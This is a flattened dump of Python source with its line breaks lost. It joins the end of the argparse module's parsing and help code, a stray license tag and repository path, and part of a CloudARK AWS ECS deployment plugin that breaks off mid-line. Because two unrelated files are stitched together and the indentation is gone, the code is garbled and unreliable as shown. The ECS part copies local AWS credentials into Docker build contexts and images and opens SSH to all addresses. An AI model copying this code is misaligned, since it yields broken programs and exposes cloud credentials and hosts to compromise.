arg_strings = self._read_args_from_files(arg_strings) # map all mutually exclusive arguments to the other arguments # they can't occur with action_conflicts = {} for mutex_group in self._mutually_exclusive_groups: group_actions = mutex_group._group_actions for i, mutex_action in enumerate(mutex_group._group_actions): conflicts = action_conflicts.setdefault(mutex_action, []) conflicts.extend(group_actions[:i]) conflicts.extend(group_actions[i + 1:]) # find all option indices, and determine the arg_string_pattern # which has an 'O' if there is an option at an index, # an 'A' if there is an argument, or a '-' if there is a '--' option_string_indices = {} arg_string_pattern_parts = [] arg_strings_iter = iter(arg_strings) for i, arg_string in enumerate(arg_strings_iter): # all args after -- are non-options if arg_string == '--': arg_string_pattern_parts.append('-') for arg_string in arg_strings_iter: arg_string_pattern_parts.append('A') # otherwise, add the arg to the arg strings # and note the index if it was an option else: option_tuple = self._parse_optional(arg_string) if option_tuple is None: pattern = 'A' else: option_string_indices[i] = option_tuple pattern = 'O' arg_string_pattern_parts.append(pattern) # join the pieces together to form the pattern arg_strings_pattern = ''.join(arg_string_pattern_parts) # converts arg strings to the appropriate and then takes the action seen_actions = set() seen_non_default_actions = set() def take_action(action, argument_strings, option_string=None): seen_actions.add(action) argument_values = self._get_values(action, argument_strings) # error if this argument is not allowed with other previously # seen arguments, assuming that actions that use the default # value don't really count as "present" if argument_values is not action.default: seen_non_default_actions.add(action) for conflict_action in action_conflicts.get(action, []): if conflict_action in seen_non_default_actions: msg = _('not allowed with argument %s') action_name = _get_action_name(conflict_action) raise ArgumentError(action, msg % action_name) # take the action if we didn't receive a SUPPRESS value # (e.g. from a default) if argument_values is not SUPPRESS: action(self, namespace, argument_values, option_string) # function to convert arg_strings into an optional action def consume_optional(start_index): # get the optional identified at this index option_tuple = option_string_indices[start_index] action, option_string, explicit_arg = option_tuple # identify additional optionals in the same arg string # (e.g. -xyz is the same as -x -y -z if no args are required) match_argument = self._match_argument action_tuples = [] while True: # if we found no optional action, skip it if action is None: extras.append(arg_strings[start_index]) return start_index + 1 # if there is an explicit argument, try to match the # optional's string arguments to only this if explicit_arg is not None: arg_count = match_argument(action, 'A') # if the action is a single-dash option and takes no # arguments, try to parse more single-dash options out # of the tail of the option string chars = self.prefix_chars if arg_count == 0 and option_string[1] not in chars: action_tuples.append((action, [], option_string)) char = option_string[0] option_string = char + explicit_arg[0] new_explicit_arg = explicit_arg[1:] or None optionals_map = self._option_string_actions if option_string in optionals_map: action = optionals_map[option_string] explicit_arg = new_explicit_arg else: msg = _('ignored explicit argument %r') raise ArgumentError(action, msg % explicit_arg) # if the action expect exactly one argument, we've # successfully matched the option; exit the loop elif arg_count == 1: stop = start_index + 1 args = [explicit_arg] action_tuples.append((action, args, option_string)) break # error if a double-dash option did not use the # explicit argument else: msg = _('ignored explicit argument %r') raise ArgumentError(action, msg % explicit_arg) # if there is no explicit argument, try to match the # optional's string arguments with the following strings # if successful, exit the loop else: start = start_index + 1 selected_patterns = arg_strings_pattern[start:] arg_count = match_argument(action, selected_patterns) stop = start + arg_count args = arg_strings[start:stop] action_tuples.append((action, args, option_string)) break # add the Optional to the list and return the index at which # the Optional's string args stopped assert action_tuples for action, args, option_string in action_tuples: take_action(action, args, option_string) return stop # the list of Positionals left to be parsed; this is modified # by consume_positionals() positionals = self._get_positional_actions() # function to convert arg_strings into positional actions def consume_positionals(start_index): # match as many Positionals as possible match_partial = self._match_arguments_partial selected_pattern = arg_strings_pattern[start_index:] arg_counts = match_partial(positionals, selected_pattern) # slice off the appropriate arg strings for each Positional # and add the Positional and its args to the list for action, arg_count in zip(positionals, arg_counts): args = arg_strings[start_index: start_index + arg_count] start_index += arg_count take_action(action, args) # slice off the Positionals that we just parsed and return the # index at which the Positionals' string args stopped positionals[:] = positionals[len(arg_counts):] return start_index # consume Positionals and Optionals alternately, until we have # passed the last option string extras = [] start_index = 0 if option_string_indices: max_option_string_index = max(option_string_indices) else: max_option_string_index = -1 while start_index <= max_option_string_index: # consume any Positionals preceding the next option next_option_string_index = min([ index for index in option_string_indices if index >= start_index]) if start_index != next_option_string_index: positionals_end_index = consume_positionals(start_index) # only try to parse the next optional if we didn't consume # the option string during the positionals parsing if positionals_end_index > start_index: start_index = positionals_end_index continue else: start_index = positionals_end_index # if we consumed all the positionals we could and we're not # at the index of an option string, there were extra arguments if start_index not in option_string_indices: strings = arg_strings[start_index:next_option_string_index] extras.extend(strings) start_index = next_option_string_index # consume the next optional and any arguments for it start_index = consume_optional(start_index) # consume any positionals following the last Optional stop_index = consume_positionals(start_index) # if we didn't consume all the argument strings, there were extras extras.extend(arg_strings[stop_index:]) # if we didn't use all the Positional objects, there were too few # arg strings supplied. if positionals: self.error(_('too few arguments')) # make sure all required actions were present, and convert defaults. for action in self._actions: if action not in seen_actions: if action.required: name = _get_action_name(action) self.error(_('argument %s is required') % name) else: # Convert action default now instead of doing it before # parsing arguments to avoid calling convert functions # twice (which may fail) if the argument was given, but # only if it was defined already in the namespace if (action.default is not None and isinstance(action.default, basestring) and hasattr(namespace, action.dest) and action.default is getattr(namespace, action.dest)): setattr(namespace, action.dest, self._get_value(action, action.default)) # make sure all required groups had one option present for group in self._mutually_exclusive_groups: if group.required: for action in group._group_actions: if action in seen_non_default_actions: break # if no actions were used, report the error else: names = [_get_action_name(action) for action in group._group_actions if action.help is not SUPPRESS] msg = _('one of the arguments %s is required') self.error(msg % ' '.join(names)) # return the updated namespace and the extra arguments return namespace, extras def _read_args_from_files(self, arg_strings): # expand arguments referencing files new_arg_strings = [] for arg_string in arg_strings: # for regular arguments, just add them back into the list if arg_string[0] not in self.fromfile_prefix_chars: new_arg_strings.append(arg_string) # replace arguments referencing files with the file content else: try: args_file = open(arg_string[1:]) try: arg_strings = [] for arg_line in args_file.read().splitlines(): for arg in self.convert_arg_line_to_args(arg_line): arg_strings.append(arg) arg_strings = self._read_args_from_files(arg_strings) new_arg_strings.extend(arg_strings) finally: args_file.close() except IOError: err = _sys.exc_info()[1] self.error(str(err)) # return the modified argument list return new_arg_strings def convert_arg_line_to_args(self, arg_line): return [arg_line] def _match_argument(self, action, arg_strings_pattern): # match the pattern for this action to the arg strings nargs_pattern = self._get_nargs_pattern(action) match = _re.match(nargs_pattern, arg_strings_pattern) # raise an exception if we weren't able to find a match if match is None: nargs_errors = { None: _('expected one argument'), OPTIONAL: _('expected at most one argument'), ONE_OR_MORE: _('expected at least one argument'), } default = _('expected %s argument(s)') % action.nargs msg = nargs_errors.get(action.nargs, default) raise ArgumentError(action, msg) # return the number of arguments matched return len(match.group(1)) def _match_arguments_partial(self, actions, arg_strings_pattern): # progressively shorten the actions list by slicing off the # final actions until we find a match result = [] for i in range(len(actions), 0, -1): actions_slice = actions[:i] pattern = ''.join([self._get_nargs_pattern(action) for action in actions_slice]) match = _re.match(pattern, arg_strings_pattern) if match is not None: result.extend([len(string) for string in match.groups()]) break # return the list of arg string counts return result def _parse_optional(self, arg_string): # if it's an empty string, it was meant to be a positional if not arg_string: return None # if it doesn't start with a prefix, it was meant to be positional if not arg_string[0] in self.prefix_chars: return None # if the option string is present in the parser, return the action if arg_string in self._option_string_actions: action = self._option_string_actions[arg_string] return action, arg_string, None # if it's just a single character, it was meant to be positional if len(arg_string) == 1: return None # if the option string before the "=" is present, return the action if '=' in arg_string: option_string, explicit_arg = arg_string.split('=', 1) if option_string in self._option_string_actions: action = self._option_string_actions[option_string] return action, option_string, explicit_arg # search through all possible prefixes of the option string # and all actions in the parser for possible interpretations option_tuples = self._get_option_tuples(arg_string) # if multiple actions match, the option string was ambiguous if len(option_tuples) > 1: options = ', '.join([option_string for action, option_string, explicit_arg in option_tuples]) tup = arg_string, options self.error(_('ambiguous option: %s could match %s') % tup) # if exactly one action matched, this segmentation is good, # so return the parsed action elif len(option_tuples) == 1: option_tuple, = option_tuples return option_tuple # if it was not found as an option, but it looks like a negative # number, it was meant to be positional # unless there are negative-number-like options if self._negative_number_matcher.match(arg_string): if not self._has_negative_number_optionals: return None # if it contains a space, it was meant to be a positional if ' ' in arg_string: return None # it was meant to be an optional but there is no such option # in this parser (though it might be a valid option in a subparser) return None, arg_string, None def _get_option_tuples(self, option_string): result = [] # option strings starting with two prefix characters are only # split at the '=' chars = self.prefix_chars if option_string[0] in chars and option_string[1] in chars: if '=' in option_string: option_prefix, explicit_arg = option_string.split('=', 1) else: option_prefix = option_string explicit_arg = None for option_string in self._option_string_actions: if option_string.startswith(option_prefix): action = self._option_string_actions[option_string] tup = action, option_string, explicit_arg result.append(tup) # single character options can be concatenated with their arguments # but multiple character options always have to have their argument # separate elif option_string[0] in chars and option_string[1] not in chars: option_prefix = option_string explicit_arg = None short_option_prefix = option_string[:2] short_explicit_arg = option_string[2:] for option_string in self._option_string_actions: if option_string == short_option_prefix: action = self._option_string_actions[option_string] tup = action, option_string, short_explicit_arg result.append(tup) elif option_string.startswith(option_prefix): action = self._option_string_actions[option_string] tup = action, option_string, explicit_arg result.append(tup) # shouldn't ever get here else: self.error(_('unexpected option string: %s') % option_string) # return the collected option tuples return result def _get_nargs_pattern(self, action): # in all examples below, we have to allow for '--' args # which are represented as '-' in the pattern nargs = action.nargs # the default (None) is assumed to be a single argument if nargs is None: nargs_pattern = '(-*A-*)' # allow zero or one arguments elif nargs == OPTIONAL: nargs_pattern = '(-*A?-*)' # allow zero or more arguments elif nargs == ZERO_OR_MORE: nargs_pattern = '(-*[A-]*)' # allow one or more arguments elif nargs == ONE_OR_MORE: nargs_pattern = '(-*A[A-]*)' # allow any number of options or arguments elif nargs == REMAINDER: nargs_pattern = '([-AO]*)' # allow one argument followed by any number of options or arguments elif nargs == PARSER: nargs_pattern = '(-*A[-AO]*)' # all others should be integers else: nargs_pattern = '(-*%s-*)' % '-*'.join('A' * nargs) # if this is an optional action, -- is not allowed if action.option_strings: nargs_pattern = nargs_pattern.replace('-*', '') nargs_pattern = nargs_pattern.replace('-', '') # return the pattern return nargs_pattern # ======================== # Value conversion methods # ======================== def _get_values(self, action, arg_strings): # for everything but PARSER args, strip out '--' if action.nargs not in [PARSER, REMAINDER]: arg_strings = [s for s in arg_strings if s != '--'] # optional argument produces a default when not present if not arg_strings and action.nargs == OPTIONAL: if action.option_strings: value = action.const else: value = action.default if isinstance(value, basestring): value = self._get_value(action, value) self._check_value(action, value) # when nargs='*' on a positional, if there were no command-line # args, use the default if it is anything other than None elif (not arg_strings and action.nargs == ZERO_OR_MORE and not action.option_strings): if action.default is not None: value = action.default else: value = arg_strings self._check_value(action, value) # single argument or optional argument produces a single value elif len(arg_strings) == 1 and action.nargs in [None, OPTIONAL]: arg_string, = arg_strings value = self._get_value(action, arg_string) self._check_value(action, value) # REMAINDER arguments convert all values, checking none elif action.nargs == REMAINDER: value = [self._get_value(action, v) for v in arg_strings] # PARSER arguments convert all values, but check only the first elif action.nargs == PARSER: value = [self._get_value(action, v) for v in arg_strings] self._check_value(action, value[0]) # all other types of nargs produce a list else: value = [self._get_value(action, v) for v in arg_strings] for v in value: self._check_value(action, v) # return the converted value return value def _get_value(self, action, arg_string): type_func = self._registry_get('type', action.type, action.type) if not _callable(type_func): msg = _('%r is not callable') raise ArgumentError(action, msg % type_func) # convert the value to the appropriate type try: result = type_func(arg_string) # ArgumentTypeErrors indicate errors except ArgumentTypeError: name = getattr(action.type, '__name__', repr(action.type)) msg = str(_sys.exc_info()[1]) raise ArgumentError(action, msg) # TypeErrors or ValueErrors also indicate errors except (TypeError, ValueError): name = getattr(action.type, '__name__', repr(action.type)) msg = _('invalid %s value: %r') raise ArgumentError(action, msg % (name, arg_string)) # return the converted value return result def _check_value(self, action, value): # converted value must be one of the choices (if specified) if action.choices is not None and value not in action.choices: tup = value, ', '.join(map(repr, action.choices)) msg = _('invalid choice: %r (choose from %s)') % tup raise ArgumentError(action, msg) # ======================= # Help-formatting methods # ======================= def format_usage(self): formatter = self._get_formatter() formatter.add_usage(self.usage, self._actions, self._mutually_exclusive_groups) return formatter.format_help() def format_help(self): formatter = self._get_formatter() # usage formatter.add_usage(self.usage, self._actions, self._mutually_exclusive_groups) # description formatter.add_text(self.description) # positionals, optionals and user-defined groups for action_group in self._action_groups: formatter.start_section(action_group.title) formatter.add_text(action_group.description) formatter.add_arguments(action_group._group_actions) formatter.end_section() # epilog formatter.add_text(self.epilog) # determine help from format above return formatter.format_help() def format_version(self): import warnings warnings.warn( 'The format_version method is deprecated -- the "version" ' 'argument to ArgumentParser is no longer supported.', DeprecationWarning) formatter = self._get_formatter() formatter.add_text(self.version) return formatter.format_help() def _get_formatter(self): return self.formatter_class(prog=self.prog) # ===================== # Help-printing methods # ===================== def print_usage(self, file=None): if file is None: file = _sys.stdout self._print_message(self.format_usage(), file) def print_help(self, file=None): if file is None: file = _sys.stdout self._print_message(self.format_help(), file) def print_version(self, file=None): import warnings warnings.warn( 'The print_version method is deprecated -- the "version" ' 'argument to ArgumentParser is no longer supported.', DeprecationWarning) self._print_message(self.format_version(), file) def _print_message(self, message, file=None): if message: if file is None: file = _sys.stderr file.write(message) # =============== # Exiting methods # =============== def exit(self, status=0, message=None): if message: self._print_message(message, _sys.stderr) _sys.exit(status) def error(self, message): """error(message: string) Prints a usage message incorporating the message to stderr and exits. If you override this in a subclass, it should not return -- it should either exit or raise an exception. """ self.print_usage(_sys.stderr) self.exit(2, _('%s: error: %s\n') % (self.prog, message))
apache-2.0
cloud-ark/cloudark
server/server_plugins/aws/coe/ecs.py
1
50287
import ast import base64 import boto3 import json import os from os.path import expanduser import re import shutil import time import server.server_plugins.coe_base as coe_base from server.common import common_functions from server.common import constants from server.common import docker_lib from server.common import exceptions from server.common import fm_logger from server.dbmodule.objects import app as app_db from server.dbmodule.objects import environment as env_db from server.dbmodule.objects import resource as res_db from server.server_plugins.aws import aws_helper home_dir = expanduser("~") APP_AND_ENV_STORE_PATH = ("{home_dir}/.cld/data/deployments/").format(home_dir=home_dir) fmlogger = fm_logger.Logging() class ECSHandler(coe_base.COEBase): """ECS Handler.""" awshelper = aws_helper.AWSHelper() allowed_commands = ["aws ecs delete-cluster*", "aws ecs delete-service*", "aws ecs describe-clusters*", "aws ecs describe-container-instances*", "aws ecs describe-services*", "aws ecs describe-task-definition*", "aws ecs describe-tasks*", "aws ecs list-clusters*", "aws ecs list-container-instances*", "aws ecs list-services*", "aws ecs list-taks-definition-families*", "aws ecs list-task-definitions*", "aws ecs list-tasks*", ] help_commands = ["aws ecs delete-cluster", "aws ecs delete-service", "aws ecs describe-clusters", "aws ecs describe-container-instances", "aws ecs describe-services", "aws ecs describe-task-definition", "aws ecs describe-tasks", "aws ecs list-clusters", "aws ecs list-container-instances", "aws ecs list-services", "aws ecs list-taks-definition-families", "aws ecs list-task-definitions", "aws ecs list-tasks", ] def __init__(self): self.ecs_client = boto3.client('ecs') self.alb_client = boto3.client('elbv2') self.docker_handler = docker_lib.DockerLib() def _verify(self, command): matched = None for pattern in ECSHandler.allowed_commands: p = re.compile(pattern, re.IGNORECASE) matched = p.match(command) if matched: return True return False @staticmethod def get_aws_details(): region = access_key = secret_key = '' aws_creds_path = home_dir + "/.aws" creds_file_path = aws_creds_path + "/credentials" config_file_path = aws_creds_path + "/config" incorrect_setup = False if not os.path.exists(creds_file_path) or \ not os.path.exists(config_file_path): incorrect_setup = True else: fp = open(aws_creds_path + "/credentials", "r") lines = fp.readlines() for line in lines: line = line.rstrip() if line.find("aws_access_key_id") >= 0: parts = line.split("=") if parts[1] == '': incorrect_setup = True else: access_key = parts[1].lstrip().rstrip() if line.find("aws_secret_access_key") >= 0: parts = line.split("=") if parts[1] == '': incorrect_setup = True else: secret_key = parts[1].lstrip().rstrip() fp = open(aws_creds_path + "/config", "r") lines = fp.readlines() for line in lines: line = line.rstrip() if line.find("output") >= 0: parts = line.split("=") if parts[1] == '': incorrect_setup = True if line.find("region") >= 0: parts = line.split("=") if parts[1] == '': incorrect_setup = True else: region = parts[1].lstrip().rstrip() if incorrect_setup: raise RuntimeError('AWS creds not setup properly.') return region, access_key, secret_key def _get_cluster_name(self, env_id): resource_obj = res_db.Resource().get_resource_for_env_by_type(env_id, 'ecs-cluster') cluster_name = resource_obj.cloud_resource_id return cluster_name def _register_task_definition(self, app_info, image, container_port, host_port, env_vars_dict, cont_name=''): if not cont_name: cont_name = app_info['app_name'] + "-" + app_info['app_version'] memory = 250 # Default memory size of 250MB. This is hard limit mem1 = common_functions.get_app_memory(app_info) if mem1: memory = int(mem1) family_name = app_info['app_name'] task_def_arn = '' revision = str(int(round(time.time() * 1000))) family_name = family_name + "-" + revision env_list = [] for key, value in env_vars_dict.iteritems(): environment_dict = {} environment_dict['name'] = key environment_dict['value'] = value env_list.append(environment_dict) if host_port != 80: env_obj = env_db.Environment().get(app_info['env_id']) env_output_config = ast.literal_eval(env_obj.output_config) sec_group_name = env_output_config['http-and-ssh-group-name'] sec_group_id = env_output_config['http-and-ssh-group-id'] vpc_id = env_output_config['vpc_id'] vpc_traffic_block = [] internet_traffic = '0.0.0.0/0' vpc_traffic_block.append(internet_traffic) port_list = [host_port] ECSHandler.awshelper.setup_security_group(vpc_id, vpc_traffic_block, sec_group_id, sec_group_name, port_list) try: resp = self.ecs_client.register_task_definition( family=family_name, containerDefinitions=[{'name': cont_name, 'image': image, 'memory': memory, 'portMappings': [{ 'containerPort': container_port, 'hostPort': host_port, 'protocol': 'tcp'}], 'environment': env_list}] ) task_def_arn = resp['taskDefinition']['taskDefinitionArn'] except Exception as e: fmlogger.error("Exception encountered in trying to register task definition:%s" % e) fmlogger.debug("Done registering task definition.") return task_def_arn, cont_name def _deregister_task_definition(self, task_def_arn): try: self.ecs_client.deregister_task_definition(taskDefinition=task_def_arn) except Exception as e: fmlogger.error("Exception encountered in deregistering task definition:%s" % e) def _get_app_url(self, app_info, cluster_name, host_port): app_url = '' self._copy_creds(app_info) df = self.docker_handler.get_dockerfile_snippet("aws") df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN cp -r aws-creds $HOME/.aws \n" "RUN sudo apt-get update && sudo apt-get install -y curl \n" "RUN sudo curl -o /usr/local/bin/ecs-cli https://s3.amazonaws.com/amazon-ecs-cli/ecs-cli-linux-amd64-v0.6.2 \ \n" " && chmod +x /usr/local/bin/ecs-cli \n" "ENTRYPOINT [\"ecs-cli\", \"ps\", \"--cluster\", \"{cluster_name}\"]").format(cluster_name=cluster_name) app_dir = app_info['app_location'] app_folder_name = app_info['app_folder_name'] cont_name = app_info['app_name'] + "-get-cont-ip" df_dir = app_dir + "/" + app_folder_name fp = open(df_dir + "/Dockerfile.get-cont-ip", "w") fp.write(df) fp.close() err, output = self.docker_handler.build_container_image(cont_name, df_dir + "/Dockerfile.get-cont-ip", df_context=df_dir) app_ip = '' if not err: run_err, run_output = self.docker_handler.run_container(cont_name) if not run_err: get_ip_cont_id = run_output.strip() logs_err, logs_output = self.docker_handler.get_logs(get_ip_cont_id) if not logs_err: task_name = app_info['app_name'] lines = logs_output.split("\n") for line in lines: str1 = ' '.join(line.split()) parts = str1.split(" ") if len(parts) >= 4: if parts[3].strip().find(task_name) >= 0: if parts[1].strip() == 'RUNNING': app_url_str = parts[2].strip() app_ip = app_url_str.split("->")[0].strip() app_url = "http://" + app_ip break else: app_url = "Could not get app url." break self.docker_handler.remove_container(get_ip_cont_id) self.docker_handler.remove_container_image(cont_name) fmlogger.debug("App URL:%s" % app_url) return app_url def _check_task(self, cluster_name, task_arn, status): status_reached = False issue_encountered = False task_desc = '' while not status_reached and not issue_encountered: try: task_desc = self.ecs_client.describe_tasks(cluster=cluster_name, tasks=[task_arn]) cont_status = task_desc['tasks'][0]['containers'][0]['lastStatus'] if cont_status.lower() == status: status_reached = True except Exception as e: fmlogger.error("Exception encountered in trying to run describe_tasks:%s" % e) issue_encountered = True return task_desc def _stop_task(self, app_id): app_obj = app_db.App().get(app_id) app_details = app_obj.output_config app_details_obj = ast.literal_eval(app_details) cluster_name = app_details_obj['cluster_name'] # TODO(devdatta): When we support multiple instances of a task then # we should revisit following logic. tasks = self.ecs_client.list_tasks(cluster=cluster_name) if 'taskArns' in tasks: task_arn = tasks['taskArns'][0] # assuming one task current try: self.ecs_client.stop_task(cluster=cluster_name, task=task_arn) except Exception as e: fmlogger.error("Exception encountered in trying to stop_task:%s" % e) self._check_task(cluster_name, task_arn, 'stopped') fmlogger.debug("Task stopped:%s" % task_arn) def _run_task(self, app_info): family_name = app_info['app_name'] env_id = app_info['env_id'] cluster_name = self._get_cluster_name(env_id) task_arn = '' try: resp = self.ecs_client.run_task(cluster=cluster_name, taskDefinition=family_name) task_arn = resp['tasks'][0]['taskArn'] except Exception as e: fmlogger.error("Exception encountered in trying to run_task:%s" % e) task_desc = self._check_task(cluster_name, task_arn, 'running') container_ip = task_desc['tasks'][0]['containers'][0]['networkBindings'][0]['bindIP'] host_port = task_desc['tasks'][0]['containers'][0]['networkBindings'][0]['hostPort'] fmlogger.debug("Container IP:%s" % container_ip) fmlogger.debug("Container Port:%s" % host_port) application_url = self._get_app_url(app_info, cluster_name, host_port) fmlogger.debug("Completed Running task") return application_url, task_arn, cluster_name def _get_path_for_dfs(self, app_info): app_dir = app_info['app_location'] app_folder_name = app_info['app_folder_name'] df_dir = app_dir + "/" + app_folder_name return df_dir def _copy_creds(self, app_info, provided_df_dir=''): df_dir = provided_df_dir if not df_dir: df_dir = self._get_path_for_dfs(app_info) if not os.path.exists(df_dir + "/aws-creds"): shutil.copytree(home_dir + "/.aws", df_dir + "/aws-creds") def _update_ecs_app_service(self, app_info, cont_name, task_def_arn, task_desired_count=1): cluster_name = self._get_cluster_name(app_info['env_id']) ECSHandler.awshelper.update_service(app_info['app_name'], cluster_name, task_def_arn, task_desired_count) def _check_if_app_is_ready(self, app_id, app_ip_url, app_url): app_status = '' if common_functions.is_app_ready(app_ip_url, app_id=app_id): fmlogger.debug("Application is ready.") app_status = constants.APP_DEPLOYMENT_COMPLETE + ":" + constants.APP_IP_IS_RESPONSIVE else: fmlogger.debug("Application could not start properly.") app_status = constants.APP_LB_NOT_YET_READY + ":" + constants.USE_APP_IP_URL return app_status def _create_ecs_app_service(self, app_info, cont_name, task_def_arn): env_obj = env_db.Environment().get(app_info['env_id']) env_output_config = ast.literal_eval(env_obj.output_config) subnet_string = env_output_config['subnets'] subnet_list = subnet_string.split(',') sec_group_id = env_output_config['http-and-ssh-group-id'] vpc_id = env_output_config['vpc_id'] cluster_name = self._get_cluster_name(app_info['env_id']) app_ports = common_functions.get_app_port(app_info) container_port = app_ports[0] host_port = app_ports[1] app_url, lb_arn, target_group_arn, listener_arn = ECSHandler.awshelper.create_service( app_info['app_name'], container_port, host_port, vpc_id, subnet_list, sec_group_id, cluster_name, task_def_arn, cont_name ) app_ip_url = self._get_app_url(app_info, cluster_name, host_port) if not app_url: app_url = app_ip_url else: app_url = "http://" + app_url fmlogger.debug("App URL:%s" % app_url) fmlogger.debug("App IP URL:%s" % app_ip_url) return app_url, app_ip_url, lb_arn, target_group_arn, listener_arn def _get_container_port(self, task_def_arn): container_port = ECSHandler.awshelper.get_container_port_from_taskdef(task_def_arn) return container_port def delete_cluster(self, env_id, env_info, resource, available_cluster_name=''): cluster_name = '' if resource: cluster_name = resource.cloud_resource_id elif available_cluster_name: cluster_name = available_cluster_name else: fmlogger.error("No cluster name given. Returning") return df = self.docker_handler.get_dockerfile_snippet("aws") df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN cp -r aws-creds $HOME/.aws \n" "RUN sudo apt-get update && sudo apt-get install -y curl \n" "RUN sudo curl -o /usr/local/bin/ecs-cli https://s3.amazonaws.com/amazon-ecs-cli/ecs-cli-linux-amd64-v0.6.2 \ \n" " && chmod +x /usr/local/bin/ecs-cli \ \n" " && ecs-cli down --cluster {cluster} --force").format(cluster=cluster_name) env_store_location = env_info['location'] fp = open(env_store_location + "/Dockerfile.delete-cluster", "w") fp.write(df) fp.close() res_id = res_db.Resource().update_res_for_env(env_id, {'status': 'deleting'}) cont_name = cluster_name + "-delete" err, output = self.docker_handler.build_container_image(cont_name, env_store_location + "/Dockerfile.delete-cluster", df_context=env_store_location) if err: fmlogger.debug("Error encountered in building container to delete cluster %s" % cluster_name) else: fmlogger.debug("Done deleting ECS cluster %s" % cluster_name) self.docker_handler.remove_container(cont_name) self.docker_handler.remove_container_image(cont_name) ec2 = boto3.resource('ec2') key_pair = ec2.KeyPair(cluster_name) try: key_pair.delete() except Exception as e: fmlogger.error("Error encountered in deleting key pair. %s" % e) try: self.ecs_client.delete_cluster(cluster=cluster_name) except Exception as e: fmlogger.error("Error encountered in deleting cluster %s" % e) env_obj = env_db.Environment().get(env_id) try: env_output_config = ast.literal_eval(env_obj.output_config) sec_group_name = env_output_config['http-and-ssh-group-name'] sec_group_id = env_output_config['http-and-ssh-group-id'] vpc_id = env_output_config['vpc_id'] ECSHandler.awshelper.delete_security_group_for_vpc(vpc_id, sec_group_id, sec_group_name) except Exception as e: fmlogger.error(e) res_db.Resource().delete(res_id) def _get_cluster_ips(self, cluster_name, env_store_location): cluster_instance_ip_list = [] df = self.docker_handler.get_dockerfile_snippet("aws") df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN cp -r aws-creds $HOME/.aws \ \n" " && aws ec2 describe-instances") fp = open(env_store_location + "/Dockerfile.get-instance-ip", "w") fp.write(df) fp.flush() fp.close() get_ip_cont_image = cluster_name+"get-ip" err, output = self.docker_handler.build_container_image(get_ip_cont_image, env_store_location + "/Dockerfile.get-instance-ip", df_context=env_store_location) if err: fmlogger.error("Error encountered in building container image to get cluster IP address. %s " + str(err)) return output_lines = output.split('\n') json_lines = [] start = False for line in output_lines: if not start: if len(line) == 1 and line == '{': start = True json_lines.append(line) else: json_lines.append(line) for line in json_lines[::-1]: if not line == '}': del json_lines[-1] else: break json_string = '\n'.join(json_lines) json_string = re.sub('\s+', '', json_string) json_output = json.loads(json_string) reservations = json_output['Reservations'] for res_item in reservations: instances = res_item['Instances'] for instance in instances: if 'KeyName' in instance: key_name = instance['KeyName'] if key_name == cluster_name: cluster_instance_ip_list.append(instance['PublicIpAddress']) # Delete the container created for obtaining IP address self.docker_handler.remove_container_image(get_ip_cont_image) return cluster_instance_ip_list def create_cluster(self, env_id, env_info): cluster_status = 'unavailable' env_obj = env_db.Environment().get(env_id) env_name = env_obj.name env_output_config = ast.literal_eval(env_obj.output_config) env_version_stamp = env_output_config['env_version_stamp'] cluster_name = env_name + "-" + env_version_stamp keypair_name = cluster_name env_store_location = env_info['location'] if not os.path.exists(env_store_location): os.makedirs(env_store_location) shutil.copytree(home_dir + "/.aws", env_store_location + "/aws-creds") # 1) Cluster vpc details handling vpc_id = '' subnet_ids = '' try: vpc_details = ECSHandler.awshelper.get_vpc_details() except Exception as e: fmlogger.error("Error occurred when trying to get vpc details %s" + str(e)) error_message = 'provisioning-failed: ' + str(e) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) vpc_id = vpc_details['vpc_id'] cidr_block = vpc_details['cidr_block'] subnet_ids = '' try: subnet_ids = ECSHandler.awshelper.get_subnet_ids(vpc_id) except Exception as e: fmlogger.error("Error occurred when trying to get subnet ids %s" + str(e)) error_message = 'provisioning-failed: ' + str(e) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) subnet_list = ','.join(subnet_ids) sec_group_name = cluster_name + "-http-ssh" sec_group_id = '' try: sec_group_id = ECSHandler.awshelper.create_security_group_for_vpc(vpc_id, sec_group_name) except Exception as e: fmlogger.error("Error occurred when trying to create security group for vpc %s" + str(e)) error_message = 'provisioning-failed: ' + str(e) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) env_output_config['subnets'] = subnet_list env_output_config['vpc_id'] = vpc_id env_output_config['cidr_block'] = cidr_block env_output_config['http-and-ssh-group-name'] = sec_group_name env_output_config['http-and-ssh-group-id'] = sec_group_id env_update = {} env_update['status'] = env_obj.status env_update['output_config'] = str(env_output_config) env_db.Environment().update(env_id, env_update) vpc_traffic_block = [] internet_traffic = '0.0.0.0/0' vpc_traffic_block.append(internet_traffic) port_list = [22, 80] try: ECSHandler.awshelper.setup_security_group(vpc_id, vpc_traffic_block, sec_group_id, sec_group_name, port_list) except Exception as e: fmlogger.error("Error occurred when trying to setup security group for vpc %s" + str(e)) error_message = 'provisioning-failed: ' + str(e) try: ECSHandler.awshelper.delete_security_group_for_vpc(vpc_id, sec_group_id, sec_group_name) except Exception as e1: fmlogger.error(e1) error_message = error_message + " + " + str(e1) env_db.Environment().update(env_id, {'output_config': error_message, 'status': 'create-failed'}) # 2) Creating the cluster region, access_key, secret_key = ECSHandler.get_aws_details() create_keypair_cmd = ("RUN aws ec2 create-key-pair --key-name " "{key_name} --query 'KeyMaterial' --output text > {key_file}.pem").format(key_name=keypair_name, key_file=keypair_name) df = self.docker_handler.get_dockerfile_snippet("aws") env_details = ast.literal_eval(env_obj.env_definition) cluster_size = 1 if 'cluster_size' in env_details['environment']['app_deployment']: cluster_size = env_details['environment']['app_deployment']['cluster_size'] instance_type = 't2.micro' if 'instance_type' in env_details['environment']['app_deployment']: instance_type = env_details['environment']['app_deployment']['instance_type'] entry_point_cmd = ( "ENTRYPOINT [\"ecs-cli\", \"up\", \"--size\", \"{size}\", \"--keypair\", \"{keypair}\", \"--capability-iam\", \"--vpc\", \"{vpc_id}\", \"--subnets\", \"{subnet_list}\", " "\"--security-group\", \"{security_group}\", \"--instance-type\", \"{instance_type}\", \"--cluster\", \"{cluster}\"] \n").format( size=cluster_size, cluster=cluster_name, vpc_id=vpc_id, keypair=keypair_name, security_group=sec_group_id, subnet_list=subnet_list, instance_type=instance_type ) fmlogger.debug("Entry point cmd:%s" % entry_point_cmd) df = df + ("COPY . /src \n" "WORKDIR /src \n" "RUN cp -r aws-creds $HOME/.aws \n" "RUN sudo apt-get update && 